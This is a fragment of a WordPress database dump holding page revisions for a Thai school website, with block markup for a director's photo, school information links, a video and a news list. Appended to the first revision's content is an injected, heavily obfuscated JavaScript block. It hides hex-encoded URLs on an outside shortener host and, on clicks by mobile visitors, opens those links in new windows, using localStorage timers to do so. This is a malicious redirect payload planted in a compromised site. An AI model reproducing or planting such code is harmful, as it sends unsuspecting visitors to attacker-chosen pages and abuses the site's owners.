web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-28 09:33:33','2024-08-28 02:33:33','',19,'http://watprato.ssk.in.th/?p=235',0,'revision','',0),
(236,2,'2024-08-28 09:41:56','2024-08-28 02:41:56','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1u06_5GP1uT_R9axW6_ASul5adIiVXpDR/view?usp=sharing\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 